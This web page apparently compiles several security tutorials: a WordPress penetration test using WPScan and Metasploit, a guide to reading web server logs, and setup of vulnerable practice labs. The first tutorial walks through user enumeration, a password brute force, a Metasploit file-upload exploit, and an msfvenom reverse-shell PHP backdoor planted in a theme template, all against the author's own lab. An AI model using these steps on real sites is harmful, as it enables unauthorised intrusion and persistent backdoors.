WordPress Penetration Testing using WPScan & Metasploit

In our previous article we had discussed “WordPress Penetration Testing Lab Setup in Ubuntu” and today you will learn wordpress penetration testing using WPScan and Metasploit

Attacker: Kali Linux

Target: WordPress 

WPScan is a black box vulnerability scanner for WordPress written in PHP mainly focus on different types of vulnerability in WordPress, WordPress themes, and plugins. Well, WPScan tool is already installed by default in Kali Linux, SamuraiWTF, Pentoo, BlackArch, and BackBox Linux. WPScanuses the database of all the available plugins and themes (approximately over 18000 plugins and 2600 themes) during testing against the target to find outdated versions and vulnerabilities.

Things WPScan can do for you are:

Detect a version of currently installed WordPress.

-Can detect sensitive files like readme, robots.txt, database replacing files, etc.

-Detect enabled features on currently installed WordPress.

-Enumerate theme version and name.

-Detect installed plugins and can tell you if it is outdated or not.

-Enumerate user names also.

Let’s start.

Go to your Kali Linux terminal and type following to download wpscan from git hub.

cd Desktop

git clone https://github.com/wpscanteam/wpscan.git

Now simply type in terminal to run the script:

./wpscan.rb –h

Using default Option we will are going to penetrate our wordpress website:

Scanning wordpress version of target website

Wpscan is a great tool to scan wordpress websites. Now we will try to do some basic scan, we will use enumerate tools to find information about themes, plugins, usernames etc.

Now type following command to scan wordpress and its server:

./wpscan.rb –u http://192.168.0.101/wordpress/

Instead of http://192.168.0.101/wordpress/ type the name of a website you want to scan. 

Here it found server: Apache/2.4.7, PHP /5.5.9 wordpress version 4.8.1, using this information an attacker can check for its exploit in Google. Moreover it also found that the upload directory has directory listing enable which means anyone can browse the directory /wp-content/uploads to view the uploaded files and contents.

Enumerating wordpress Theme

A theme controls the general look and feel of website including things like page layout, widget locations, and default font and color choices. WordPress.com has a wide range of themes for its user and each theme has an about page that includes features and instructions.

To scan installed theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate t

Enumerating wordpress vulnerable Theme

To scan installed vulnerable theme of wordpress website type following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vt

From scanning result we didn’t find any vulnerable theme which means there is no vulnerable theme which can be exploited.

Enumerating wordpress Plugins

Plugins are small piece of code of a program which can be added to a WordPress website to extend its functionality.

To find installed plugins on our target’s WordPress website, type in terminal:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate p

Finally, after few seconds, you will get result of installed plug-in. You can see that in my scan result askismet v3.3.3, pixabay-images v2.14, wptouch v3.4.3 such types of installed plug-in are detected. As well as it also describe last update and latest version of that plug-in.

Enumerating wordpress vulnerable Plugins

Now type following command to scan vulnerable plug-in of any wordpress website:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate vp

After few seconds, you will get result of installed vulnerable plug-in of website. From given image you can observe that the red color indicates vulnerable plug-ins as well as link of exploits CVE.

Exploit vulnerable plug-in using Metasploit

This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.

Open the terminal load metasploit framework and execute following command:

use exploit/unix/webapp/wp_reflexgallery_file_upload

msf exploit(wp_reflexgallery_file_upload) > set rhost 192.168.0.101

msf exploit(wp_reflexgallery_file_upload) > set targetURI /wordpress/

msf exploit(wp_reflexgallery_file_upload) > exploit

Awesome!! From given image you can observe the meterpreter session of victim’s web server.

meterpreter> sysinfo

Enumerating wordpress Usernames

In order to enumerate user names of wordpress website execute following command:

./wpscan.rb –u http://192.168.0.101/wordpress/–enumerate u

After sometime it will dump the table of usernames. In this scan I had found three users with their Id as given below:

ID 1: admin

ID2: ignite

ID: demo

Enumerate ALL with single command

Whatever we have scanned above can be easily enumerate at once by executing given below command:

./wpscan.rb -u http://192.168.0.101/wordpress/ -e at -e ap -e u

Here we had use option –e at –e ap –e u for following reasons:

–e at : enumerate all themes of targeted website

–e ap: enumerate all plugins of targeted website

–e u: enumerate all usernames of targetd website

Brute force attack using Wpscan

With help of username which we had enumerated above we can create a wordlist of password for user admin and can try brute force login attack using given below command.

./wpscan.rb –u http://192.168.0.101/wordpress/ –wordlist /root/Desktop/dict.txt –username admin

It will start matching the valid combination of username and password for login and then dump the result, from given image you can see it found login credential of targeted website as admin:password.

Generate PHP backdoor in wordpress

You can use above credential for login into admin panel where we can upload any theme, taking advantage of admin right we will try to upload malicious script to achieve reverse connection from victim’s system.

Once you are inside admin panel click on Appearance from dashboard and then select option editor.

Now select template 404.php given on the right side of the frame; after that you will found some php code in middle frame for 404 temperate. Erase the entire php code so that you can add malicious php code for generating backdoor inside website as a new theme.

Now use msfvenom to generate malicious PHP script and type following command.

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *<?php……….die();  further we will past it inside wordpress template as a new theme.

Now past above copied PHP text *<?php……….die();   here as new theme under selected  404.php template.

On other hand Load metasploit framework and start multi/handler

use exploit/multi/handler

 msf exploit(handler) >set payload php/meterpreter/reverse_tcp

msf exploit(handler) >set lhost 192.168.0.107

msf exploit(handler) >4444

msf exploit(handler) >exploit

When you will execute your uploaded theme 404.php in browser you will receive reverse connection at multi/handler and get meterpreter session of victim’s system.

http://192.168.0.101/wordpress/wp-content/themes/twentyseventeen/404.php

Here form screenshot you can see through meterpreter we have access victim’s shell.

meterpreter> sysinfo

In this way using WPSCAN and METASPLOIT admin can check the strength and weakness of wordpress website.

AUTHOR: AkshayBhardwaj is a passionate Hacker, Information Security Enthusiast and Researcher | Sketch Artist |Technical writer.

Understanding Log Analysis of Web Server

From Wikipedia

Logs

Log files are a standard tool for computer systems developers and administrators. They record the (W5) “what happened when by whom, where and why happened” of the system. This information can record faults and help their diagnosis.

Log Format

The Common Log Format also known as the NCSA Common log format. Each line in a file stored in the Common Log Format has the following syntax:

[host; ident; authuser; date; request; status; bytes]

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] “GET /apache_pb.gif HTTP/1.0” 200 1068

  1. A “” in a field indicates missing data.
  2. 0.0.1is the IP address of the client (remote host) which made the request to the server.
  3. User-identifieris the RFC 1413 identity of the client.
  4. raj is the user id of the person requesting the document.
  5. [30/Aug/2017:10:25:16 -0700] is the date, time, and time zone that the request was received
  6. GET /apache_pb.gif HTTP/1.0” is the request line from the client.
  7. 200is the HTTP status code returned to the client. 2xx is a successful response, 3xx a redirection, 4xx a client error, and 5xx a server error.
  8. 2326is the size of the object returned to the client, measured in bytes

 Importance of log analysis

Logs play an important role in tracking each client computer’s activity and its communication with other computers and networks. Network or system administrator analysis log in order to keep an eye on your network for vulnerabilities that may enter in network to access sensitive information in the form of security attacks. You might be able to identify who introduces risks, and help that person to use better precautions.

Location of log files

Generally in Linux or UNIX system logs are created under /var/log directory, here you will find some very important log file such as: apache, auth, mysql, kernel, bootstrap, dmeg, apt and etc.

Some Important Types of Logs

Application log

The Application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.

Apache: /var/log/apache

Samba:  /var/log/samba

Mail: /var/log/

Mysql:  /var/log/

For Example let’s consider apache log files for analyzing its logs, there are two types of apache http server log files:

  • Apache Access Log File

Apache server records all incoming requests and all requests processed to a log file. Location and content of the access log /var/log/apache/access.log.

  • Apache Error Log File

All apache errors information those are found during server requests are logged to this file. Location of error log /var/log/apache/error.log.

Now open apache2 log using following command in terminal (UNIX system).

cd apache2

ls

You can see all log files of apache2 as shown in given image.

echo>access.log

Using echo command I had deleted all previous logs from inside access.log file, so that we can read our recent logs for current activity.

As I had described above that apache2 will create logs for client activities on browser. Therefore I had opened some web application like: dvwa, bwapp and wordpress site in respective order and as result in same order log will be created inside apache2.

There are so many command and tools used for log analyzing; among them we had use only three command line utility cat, head and tail for reading logs. 

From given image you can see we have used cat command to read log which begins with dvwa’s log and end on wordpress’s log.

cat is standard UNIX utility use for reading content of file. With help of cat command you can view whole content inside any log file.

Syntax: cat [options] file name

cat access.log

head is a program on UNIX and Unix-like systems used to display the beginning of a text file.

Syntax: head [options] file name

head access.log

By default, head will print the first 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: head – n 30 file name.

tail is a program on UNIX and Unix-like systems used to display the tail end of a text file.

Syntax: tail [options] file name 

tail access.log

From given image you can perceive that it has shown log for wordpress at the end of file.

Significant way of reading logs

Since tail reads end lines of log file which consist information of recent activity of the client therefore we are going to take help tail’s option for reading log in a significant way.

By default, tail will output the last 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: tail – n 30 file name.

tail -n 2 access.log

From given image you can see above command applied filter and read only two logs from recent records.

If you want to read multiple log files simultaneously then type following command.

 tail -n 2 access.log error.log

From given image you can observe that it has shown two-two logs for each i.e. access log and error log.

Now apply filter using grep command with tail command for specific records of log.

Syntax: tail [option] file name | grep “string” [option]

tail access.log | grep 200

From given image you can notice, it has highlighted log having string as 200.  Generally for a network administrator this command will reduce his/her effort while log analyzing because he/she can directly read those log where client or attacker has got successfully response from server.

When server is not able to give reply of request made by client it response through error 404 “not found”.

tail access.log | grep 404

From given image you can see it has highlighted log string 404 from set of log records.

As you known on browser we had browsed web application dvwa, bwapp and wordpress as respective sequences, therefore we get their log in same sequence dvwa log at top; bwapp log at middle and wordpress log at the end of access.log file

Log files are very large, reading them at ones will not possible for administrator therefore he/she can use after and before option with grep as filter for logs.

Syntax: tail [option] file name | grep -A [number of lines] “string”

tail access.log | grep -A 2 “bwapp”

Here -A stand for after, therefore it will filter 2 logs created after bwapp logs and hence it will indicates 2 logs of wordpress as shown in given image.

Similarly apply filter using before parameter and type following command with specific argument.

tail access.log | grep -B 2 “wordpress”

Here -B stand for before, therefore it will filter 2 logs created before wordpress logs and hence it will indicates 2 logs of bwapp as shown in given image.

Auth Log

Auth.log file holds system authorization information; including user login attempts either successful or failure both type of log records as well as authentication method that were used for establishing connection with server, for example SSH login between server and client

Location: /var/log

Again I had used echo command to remove all previous record from inside auth.log

echo>auth.log

Suppose client uses putty for ssh login into server.

If the client having valid credential for ssh then he will get successfully login into server. From given image you can see I had successfully login into server. Hence inside server auth.log file, it will create a new record for SSH login successful.

While in next image you can read access denied message which means fail in login into SSH server. Hence this time inside auth log again a new record will be create for SSH login failure.

Now let‘s read the whole records of auth log file for above client activities using cat command.

cat auth.log

From given image you can read the logs for successful and failure login.

Vsftpd Log

Vsftd log holds system authentication log for FTP login records either successful or failure.

Location: /var/log

I had deleted all previous logs using echo command and using WinSCP for FTP server login. You can observe that we had login successfully. Hence it will create a new record in vsftpd.log for client login successfully.

Now let’s verify it though vsftpd log file and use cat command for reading whole file. From given image you can observe it has created a record in log file for client 192.168.0.104 is CONNECT.

cat vsftpd.log

System Log

syslog is a standard for system logs or  message logging. Administrator may use syslog for system management and security auditing as well as general informational, analysis, and debugging messages. A wide variety of devices, such as printers, routers, and message receivers across many platforms use the syslog standard.

Location: /var/log

Use cat command for reading syslog as shown in given image.

cat syslog

APT Log

The apt is standard command-line tool in UNIX, which works for performing functions such as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Location: /var/log

Hence apt contain its own log file for all new and previous installed software. It has two log file as:

  • log : /var/log/apt
  • log /var/log/apt

Now type following command for reading history log of apt.

cat history.log

From given image you can observe the result which contains information of a software installation and updates.

It was a brief theory for reading logs in simplest way…………………………………………..

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

WordPress Penetration Testing Lab Setup in Ubuntu

Today we are demonstrating how to install and configure wordpress for penetration testing inside the web server. To configure wordpress, you must install any web host software such as xampp/wamp or read our previous article “Configure Web Server for Penetration Testing (Beginner Guide)” which will help in set up of your own localhost web server. Here we are using our own web server which had configure in ubuntu 14.04.

WordPress is a free and open-source content management system (CMS) based on PHP and MYSQL. It is installed on a web server that is either part of an Internet hosting service or a network host in its own right. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites.

For more detail visit https://en.wikipedia.org/wiki/WordPress

Let’s start!!

If you have read our previous article, then you might be remembering that we had specified blank space as password for root user. Now start with login into phpmyadmin as root user.

phpmyadmin is separated into two parts left and right panels. The left panel contains name of existing databases and right panel contains functional setting for performing maintenance operations on tables, backing up information, editing things and creating or deleting the database.

In order to store wordpress data we need to create a new database. Now click on databases tab given at the top of right panel.

Now enter the name for database system such as wordpress and then click on create. After that you will observe a new database “wordpress” will get add into left panel.

Open the terminal and type following command to download wordpress inside /var/www/html

wget https://wordpress.org/latest.zip

Now unzip the folder of latest.zip

unzip latest.zip

ls

From given image you can see we have folder of wordpress inside /html/ directory.

Now for wordpress installations open it on browser through URL: http:// localhost/wordpress as shown in given image.  At the end of window click on let’s go to proceed for installation.

At another window enter your database connection information such as:

Database Name: wordpress

Username: root

Password: (null)

Database host: localhost

Now click on submit tab.

In next window you will get some code of line to configure wp-config.php file as shown in given image. Now copy the highlighted text into a text document. After you done come back and click on run the install.

As you can see we have pasted above copy text inside a text file and then save it as wp-config.php on desktop.

Since we have saved wp-config.php on desktop therefore we are going to shift it inside /var/www/html/wordpress using following command.

mv /home/raj/Desktop/wp-config.php .

After then go back to previous open tab and click on Run the install.

“Welcome” the new window will come up, now fills the information below and you’ll be on the way for wordpress installation.

Site title: Pentest Lab

Username: admin

Password: password

Email: (your email ID)

At last click on “install wordpress” tab given at the end of window.

Once wordpress will successfully install, click on log in as shown in given image.

Now enter your wordpress credential for login.

Great!!  Finally our web site “pentest lab” is online on localhost server and is ready posting articles and blogs.

 Now we need to add some Plug-in wordpress so that we can make wordpress penetration testing by exploiting these plug-in based vulnerabilities. WordPress’ plug-in architecture allows users to extend the features and functionality of a website or blog.

Now type following command to give all permission to the file and folder own by www-data of /var/www/html.

sudo chown –R www-data /var/www/html

For penetration testing practice we are going to download some vulnerable plug-in so that we have our own vulnerable wordpress site.

We had downloaded a vulnerable plug-in “reflex gallery 3.1.3 arbitrary file upload” found from inside the exploit-db.com, you can download many other vulnerable plug-in from exploit database.

Now login into wordpress as admin to access administration control panel and then select plugins option from dashboard and go for new plugin so that you can add your install plug-in in your wordpress.

Now browse you downloaded zip file and then click on upload plugin for installation.

It will install plug-in into wordpress, now to activate it click on given tab Activate Plugin as shown in given image.

Similarly you can install as much as can be possible vulnerable plug-in into wordpress. You can see we had installed many plug-in inside our wordpress so that we can make more practice on wordpress penetration testing which you will learn in our next upcoming article.

Wait for our next article where you will how exploit wordpress plug-in base vulnerability.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Configure Web Application Penetration Testing Lab

In our previous article you had learnt how to configure a web server using ubuntu system with the help of LAMP services for designing your own pentest lab. Today you will how to configure the famous 4 web application (DVWA, bWAPP, SQLI and Mutillidae) inside web server for web penetration (WAPT) practices.

Let’s Begin!!

Open the terminal and login with root user and move inside html directory using following command.

sudo bash

cd /var/www/html

Basically to operate all web application on browser through localhost you should download and configure these web application inside html directory only.

DVWA

Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications.

Download dvwa inside html using following command.

wget https://github.com/ethicalhack3r/DVWA/archive/master.zip

Now type following command step by step to configure dvwa.

ls

From given image you can see we have downloaded master.zip file, now unzip this file using below command.

unzip master.zip

After unzip, move file and folder of DVWA-master into dvwa

ls

mv DVWA-master dvwa

ls

cd dvwa

ls

 After then move inside config in order to rename config.inc.php.dist into config.inc.php

cd config/

ls

mv config.inc.php.dist config.inc.php

gedit config.inc.php

Now open config.inc.php using above command, here you will observe that db_password is [email protected]  But remove the password and left it blank space for db_password.

 After leaving blank password save config.inc.php

Now run web application in browser through URL:  localhost/dvwa/setup.php

As shown in given image a web page will get open for dvwa setup, now click on given tab Create/ Reset Database.

Login into web application through URL: localhost/dvwa/login.php by default the username and password is admin: password respectively for login into dvwa.

Using above step for installation you can configure dvwa in your web server and perform web penetration testing by exploiting given vulnerabilities.

bWAPP

buggy web application is a deliberately insecure web application. It helps security enthusiasts, systems engineers, developers and students to discover and to prevent web vulnerabilities. bWAPP prepares one to conduct successful web application penetration testing and ethical hacking projects. It is made for educational purposes.

Now download bwapp and then unzip that folder.

cd /var/www/html

Now shift bwapp from download directory to html directory using move command

mv /home/raj/downloads/bwapp_latest/bwapp .

ls

Now you can observe we have bwapp inside html directories.

Now make following changes inside the file “setting.php” for its configuration.

cd admin

ls

gedit settings.php

Here remove the password “bug” for db_password as done above.

Now Leave blank space for db_password and then save the file.

Now browse web application through URL: localhost/bwapp/install.php

As shown in image a web page will get open for installation; now click on given link “click hereto install wapp”. After that your bwapp will get successfully install and will ready for penetration testing.

Now use default username and password bee: bug for login into bwapp and start your practice.

SQLI

SQLI labs to test error based, Blind boolean based, Time based.

cd /var/www/html

Download SQLI dhakkan inside html directory and then unzip it.

wget https://github.com/Audi-1/sqli-labs/archive/master.zip

unzip master.zip

Copy all file and folder of sqli-labs-master into sqli using following command

mv sqli-labs-master sqli

Now open web application inside browser using URL: localhost/sqli Click on “Setup/reset Database for labs”    

This will create database setup for lab and after that it will be ready for SQL penetration testing. This lab is design for mainly sql injection attack each lesson have different sql error.

OWASP Mutillidae II Web Pen-Test Practice Application

OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiest. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP. It is pre-installed on SamuraiWTF, Rapid7 Metasploitable-2, and OWASP BWA. The existing version can be updated on these platforms. With dozens of vulns and hints to help the user; this is an easy-to-use web hacking environment designed for labs, security enthusiast, classrooms, CTF, and vulnerability assessment tool targets. Mutillidae has been used in graduate security courses, corporate web sec training courses, and as an “assess the assessor” target for vulnerability assessment software

Download mutillidae using following command

wget https://sourceforge.net/projects/mutillidae/files/latest/download

cd /var/www/html

Move file and folder of mutillidae from inside download into var/www/html by typing following command

mv /home/raj/Downloads/mutillidae

This web application does not required extra configuration setting you can directly open it inside browser using URL: localhost/mutillidae

Now use your pentesting skill to exploit its vulnerability.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...